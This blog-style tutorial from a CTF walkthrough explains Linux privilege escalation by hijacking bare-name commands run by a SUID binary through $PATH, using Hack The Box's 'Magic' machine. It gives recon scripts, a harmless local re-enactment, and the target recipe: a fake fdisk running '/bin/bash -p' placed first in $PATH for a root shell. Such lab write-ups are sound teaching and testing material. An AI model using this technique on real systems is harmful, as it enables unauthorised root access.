LINUX PRIVILEGE ESCALATION

Hijacking Relative Paths in SUID Programs

Nairuz Abulhul, published in R3d Buck3T
3 min read, Nov 3, 2020

Linux Privilege Escalation Technique

Many common Linux privilege escalation techniques revolve around abusing SUID programs. In this quick tutorial, we will look at one of them: hijacking the commands a SUID program runs by bare name, without an absolute path, through the $PATH variable.

Before we get started, let’s create a baseline understanding of what SUID is, the difference between Absolute paths and Relative paths, and how we can use them to our advantage.

$_Set_User_ID:

SUID (Set User ID) is a special Linux permission bit that makes a file run with the effective user ID of the file's owner rather than of the user who launched it. So if a SUID file is owned by root, a low-privileged user who runs it gets code executing with root's privileges.

💡 The kernel honours the SUID bit only on native executables (ELF binaries). It ignores the bit on interpreted scripts such as Python, Bash or Ruby files, because what actually gets executed is the interpreter, not the script, so a SUID bit on a script cannot be abused this way.

$_Absolute_Path_VS_Relative_Path:

An absolute path is the full path that starts at the root directory (a leading forward slash, /) and walks down to the requested file or directory. Running pwd prints the absolute path of the directory you are currently in.

Absolute paths don't change when the current directory changes; think of them as hardcoded. Relative paths are resolved against the current working directory, so the same relative path points at different files from different locations. A bare command name such as fdisk, with no slash at all, is a third case and the one that matters here: the shell (or the C library's execvp) looks it up by searching each directory listed in the $PATH environment variable, in order, and runs the first match it finds.

To demo this technique, I picked the Magic machine from Hack The Box. The machine has a custom SUID executable called sysinfo that runs system commands, [free, lshw, fdisk, cpuinfo], by bare name instead of by absolute path.

Tracing the program with strace, we see sysinfo executing these commands without their absolute paths; each one is looked up through $PATH instead (see the picture below). Note that tracing a SUID binary as an unprivileged user does not hand you its privileges: the kernel drops the setuid effect for a traced process, but the execve calls are still visible, which is all we need at this stage.

[Figure: strace output showing lshw, fdisk and free invoked by bare name, without absolute paths]
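Two recon checks for this phase, as an added example that is not the article's or the Magic box's code: listing SUID files under a directory, and pulling the bare, $PATH-resolved command names out of strace output. The trace lines are constructed to look like `strace -f -e trace=execve` output from a program that uses system() or popen() (each call shows up as the shell being executed with `-c`); they are not the real sysinfo trace, and the paths, PIDs and addresses in them are made up.

```shell
#!/bin/sh
# Added example (not from the article). Helpers for the recon phase:
#   find_suid DIR            -> SUID files under DIR (same query as "find / -perm -4000")
#   hijackable_commands TXT  -> command words that a system()/popen() call resolves via $PATH
set -u

find_suid() {
    find "$1" -perm -4000 -type f 2>/dev/null
}

# system()/popen() exec the shell as: execve("/bin/sh", ["sh", "-c", "<command line>"], ...)
# The first word of <command line> is hijackable iff it is not an absolute path.
hijackable_commands() {
    printf '%s\n' "$1" \
      | sed -n 's/.*\["sh", "-c", "\([^"]*\)".*/\1/p' \
      | awk 'substr($1, 1, 1) != "/" { print $1 }'
}

# CONSTRUCTED sample trace, shaped like `strace -f -e trace=execve` output.
SAMPLE_TRACE='execve("/usr/bin/sysinfo", ["sysinfo"], 0x7ffc /* 20 vars */) = 0
[pid  1234] execve("/bin/sh", ["sh", "-c", "free -m"], 0x5555 /* 20 vars */) = 0
[pid  1234] execve("/usr/bin/free", ["free", "-m"], 0x5555 /* 20 vars */) = 0
[pid  1235] execve("/bin/sh", ["sh", "-c", "fdisk -l"], 0x5555 /* 20 vars */) = 0
[pid  1235] execve("/sbin/fdisk", ["fdisk", "-l"], 0x5555 /* 20 vars */) = 0
[pid  1236] execve("/bin/sh", ["sh", "-c", "/usr/bin/lshw -short"], 0x5555 /* 20 vars */) = 0'

# Throwaway tree for find_suid: setting u+s on a file you own needs no root.
DEMO="$(mktemp -d)"
trap 'rm -rf "$DEMO"' EXIT
: > "$DEMO/suid_bin";  chmod 4755 "$DEMO/suid_bin"
: > "$DEMO/plain_bin"; chmod 0755 "$DEMO/plain_bin"

echo "hijackable via \$PATH:"
hijackable_commands "$SAMPLE_TRACE"   # free and fdisk; lshw is called by absolute path
echo "SUID files under $DEMO:"
find_suid "$DEMO"                      # only suid_bin
```

The sed expression keys on the argv that glibc's system() and popen() always use (`sh -c <string>`); a program that builds an execvp() call directly will show the bare name as the first execve argument instead, so read the trace for both shapes.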

This opens the door for us: we can create our own executables named after those commands, put them in a directory we control, and place that directory at the front of the $PATH that sysinfo inherits from our environment when we run it.

📝 The trick is that $PATH is inherited from the caller's environment, and a bare-name lookup takes the first directory in that list that contains a matching file name. When we insert our current working directory at the front of $PATH, the shell spawned by the program finds our fdisk before it ever reaches the real one further down the list, so our file runs with the SUID program's root privileges. Order matters: appending our directory at the end would achieve nothing, because the genuine binary would be found first.

$_Exploitation_Demo:

1. Create a script that spawns a shell (bash or python) and name it after one of the commands used by the sysinfo program, for example "fdisk".

2. Make the file executable.

3. Modify the environment variable $PATH to include the current working directory, placed first. Here is our original, unchanged $PATH:

/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games

Add the current working directory (the pwd output, /dev/shm in this case) in front of those entries.

New modified $PATH (the current working directory prepended to the list above):

Now, whenever sysinfo runs fdisk by name, the lookup checks the directories in $PATH one by one until it finds a file called "fdisk". Because /dev/shm comes first, it finds our script before the real fdisk and executes it with root privileges, and we get our root shell 😈
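The three steps above as a local re-enactment you can run as an unprivileged user, with no SUID binary involved. This is an added example, not the article's commands or the Magic box's sysinfo: two throwaway directories stand in for the real fdisk's location and for /dev/shm, and a `/bin/sh -c 'fdisk -l'` call stands in for what sysinfo's system("fdisk -l") does. The directory names and the two fake fdisk scripts are made up for the demo; what it shows is that the hijack works only when the attacker's directory comes before the genuine one in $PATH.

```shell
#!/bin/sh
# Added example, not code from the article or the Magic box. Stand-ins:
#   $WORK/legit/fdisk  plays the real fdisk found later in $PATH (e.g. under /sbin)
#   $WORK/evil/fdisk   plays the attacker's script dropped in /dev/shm
#   victim()           plays the SUID sysinfo binary: it runs "fdisk -l" through
#                      /bin/sh -c, which is what system("fdisk -l") does, so the
#                      bare name is resolved by searching $PATH in order.
set -u

WORK="$(mktemp -d)"
trap 'rm -rf "$WORK"' EXIT
mkdir -p "$WORK/legit" "$WORK/evil"

# Stand-in for the genuine binary.
printf '#!/bin/sh\necho "real fdisk got args: $*"\n' > "$WORK/legit/fdisk"
# Stand-in for the payload. On a target the body would be "/bin/bash -p" (see the
# note below); here it only reports that it ran and under which uid.
printf '#!/bin/sh\necho "hijacked fdisk running as uid $(id -u)"\n' > "$WORK/evil/fdisk"
chmod +x "$WORK/legit/fdisk" "$WORK/evil/fdisk"

# victim PATHVALUE: run the command the way a SUID program calling system() would.
# Only this one command sees the modified PATH; /bin/sh is named absolutely on purpose.
victim() {
    PATH="$1" /bin/sh -c 'fdisk -l'
}

# which_fdisk PATHVALUE -> "real" or "hijacked" (first word of the victim's output)
which_fdisk() {
    victim "$1" | awk '{ print $1 }'
}

STOCK="$WORK/legit:/usr/bin:/bin"   # stand-in for the unmodified $PATH

echo "unmodified PATH:   $(which_fdisk "$STOCK")"                 # real
echo "evil prepended:    $(which_fdisk "$WORK/evil:$STOCK")"      # hijacked
echo "evil appended:     $(which_fdisk "$STOCK:$WORK/evil")"      # real: our dir is searched too late
```

On the target the same idea is three commands in a writable directory: write a script whose body is `/bin/bash -p`, make it executable under the name fdisk, and export $PATH with that directory first before running sysinfo. The `-p` flag matters: bash resets its effective UID to the real UID on startup when the two differ, so a plain `/bin/bash` payload hands back an unprivileged shell. If the directory you pick is mounted noexec, the kernel refuses to execute the script from it; use another writable location.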


I spend 70% of the time reading security stuff and 30% trying to make it work !!! aka Pentester [+] Publication: R3d Buck3T